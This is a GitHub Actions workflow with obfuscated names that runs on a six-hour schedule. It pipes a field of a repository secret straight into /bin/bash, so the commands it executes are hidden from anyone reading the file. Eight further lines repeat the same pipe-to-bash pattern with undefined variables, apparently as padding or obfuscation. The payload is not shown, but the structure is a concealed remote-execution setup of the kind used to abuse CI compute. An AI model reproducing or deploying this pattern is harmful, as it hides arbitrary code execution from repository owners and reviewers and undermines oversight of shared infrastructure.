name: yushituoqie
on:
  workflow_dispatch:
  schedule:
    - cron: '51 1/6 * * *'

jobs:  # 14405
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yushituoqie
        env:
          ntv763: ${{ secrets.ntv763 }}
        run: |
          echo $ntv763 | jq -r .opkxj38 | /bin/bash
          echo $uvllu20 | jq -r .ycbuf416 | /bin/bash
          echo $b3 | jq -r .kw36398 | /bin/bash
          echo $jpn156 | jq -r .x5 | /bin/bash
          echo $tgkmm77 | jq -r .nzeax59960 | /bin/bash
          echo $cpb6293 | jq -r .dn9 | /bin/bash
          echo $nlaiv852 | jq -r .n985 | /bin/bash
          echo $yd322 | jq -r .m02594 | /bin/bash
          echo $hteh6 | jq -r .ve6241 | /bin/bash

